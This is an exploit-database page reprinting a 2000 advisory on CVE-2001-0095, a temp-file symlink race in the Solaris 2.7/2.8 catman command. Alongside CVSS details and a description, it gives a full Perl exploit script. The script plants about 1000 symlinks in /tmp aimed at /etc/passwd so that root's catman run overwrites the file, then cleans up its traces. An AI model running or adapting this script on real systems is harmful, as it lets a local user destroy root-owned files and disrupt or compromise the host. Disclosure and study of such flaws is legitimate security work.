Solaris 2.7/2.8 catman Temp File Vulnerability

2018.09.27
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-Other


CVSS Base Score: 1.2/10
Impact Subscore: 2.9/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: Solaris 2.7/2.8 catman Temp File Vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2000-12-18 CVE-ID:[CVE-2001-0095] Download Site: www.oracle.com Vendor: Oracle Systems Vendor Notified: 2000-11-23 Vendor Contact: Advisory: http://www.vapid.dhs.org/advisories/solaris_2.7_2.8_catman_race_condition_vulnerability.html Description: Through the use of symlinking temporary files created by /usr/bin/catman upon execution by root a local user can clobber root owned files. Vulnerability: The catman command creates preformatted versions of the online manual. It also creates the windex database for utilities like apropos and whatis. The problem lies with catman creating a temporary file in /tmp, the file has the form of /tmp/sman_pidofcatman. An attacker can monitor the process list for the execution of catman and create a symlink to a root owned file. catman will upon execution overwrite the contents of that file. This is a new bug for catman and is not addressed in the current patch cluster for Solaris 2.7 Sparc. Export: JSON TEXT XML Exploit Code: #!/usr/local/bin/perl -w # The problem is catman creates files in /tmp insecurly. They are based on the # PID of the catman process, catman will happily clobber any files that are # symlinked to that file. # The idea of this script is to create a block of symlinks to the target file # with the current PID as a starting point. Depending on what load your # system has this creates 1000 files in /tmp as sman_$currentpid + 1000. # The drawback is you would have to know around when root would be executing # catman. # A better solution would be to monitor for the catman process and create the # link before catman creates the file. I think this is a really small window # however. This worked on a patched Solaris 2.7 box (August 2000 patch # cluster) # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1 # 11/21/2000 Vapid Labs. # http://vapid.dhs.org $clobber = "/etc/passwd"; #file to clobber $X=getpgrp(); $Xc=$X; #Constant $Y=$X+1000; #Constant while($X < $Y) { print "Linking /tmp/sman_$X to $clobber :"; # Change $clobber to what you want to clobber. if (symlink ($clobber, "/tmp/sman_$X")) { print "Sucess\n"; } else { print "failed, Busy system?\n"; } $X=$X+1; } #Watch /tmp and see if catman is executed in time. while(1) { $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; open (list,$list) or "die cant open ls...\n"; while() { @args = split "_",$_; chop ($args[1]); if ($args[1] >= $Xc && $args[1] <= $Y) { print "Looks like pid $args[1] is the winner\n cleaning....\n"; `/usr/bin/rm -f /tmp/sman*`; exit(1); } } }

References:

http://www.vapidlabs.com/advisory.php?v=39


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top